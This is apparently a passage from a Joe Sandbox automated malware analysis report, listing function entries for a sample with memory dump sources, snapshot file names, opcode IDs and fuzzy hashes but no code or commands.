                                                                                                          • Opcode Fuzzy Hash: 0481d849505c92572687363217c0d6021469f0554720638590436490d332069a
                                                                                                          • Instruction Fuzzy Hash: 8AA022302030038AB3200E3AC808B3833888FC03C3B0E80F0B002C08C8EA2CC2C8BB22
                                                                                                          Function 030845C0 Relevance: .0, Instructions: 5COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6c3d098559577489fd804fd71942158a0f5cae9ef2917bbbabdb7403787012fa
                                                                                                          • Instruction ID: f6f82a0076ffafa69a43183d12eb3e05b5c39dff60f6cabd03cf647a7bfb7887
                                                                                                          • Opcode Fuzzy Hash: 6c3d098559577489fd804fd71942158a0f5cae9ef2917bbbabdb7403787012fa
                                                                                                          • Instruction Fuzzy Hash: 05B012B34009019AE6105E60D904B157A21AFA0702F2988306200004C882304010FB21

                                                                                                          Non-executed Functions

                                                                                                          Function 03957502 Relevance: .4, Instructions: 365COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000003.2286970301.000000000394F000.00000004.00000800.00020000.00000000.sdmp, Offset: 0394F000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_3_394f000_ghhqoznpon_638708802577261661.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5cae0072e60efb8bb92eb5a38089bb75053a9bc85667a22e2a562c73f1be8420
                                                                                                          • Instruction ID: d9ac6c294925ae997d7da4c412ecc8b383297f40a840b43690489732a9eaf65e
                                                                                                          • Opcode Fuzzy Hash: 5cae0072e60efb8bb92eb5a38089bb75053a9bc85667a22e2a562c73f1be8420
                                                                                                          • Instruction Fuzzy Hash: 63A1B32140E7D25FC303DF78CC656967FB5AF03210B1E45DAE480CF1A7D2695A5ACBA2
                                                                                                          Function 007346D7 Relevance: .2, Instructions: 208COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_3_731000_ghhqoznpon_638708802577261661.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2c47571c0f34fe692abe3fd9e09d5f20e2de5741f76eaa11bd1246da0eda5feb
                                                                                                          • Instruction ID: 0ebc8e9be4d416b7f1e1ade4022e5d46b2a0ca765cd4df5c10f4d0dde24a9afa
                                                                                                          • Opcode Fuzzy Hash: 2c47571c0f34fe692abe3fd9e09d5f20e2de5741f76eaa11bd1246da0eda5feb
                                                                                                          • Instruction Fuzzy Hash: 0D71F22104F7D29FD7538B7488616927FB5AF07228B1E05DBD4C0CF0A3E26E595ACB62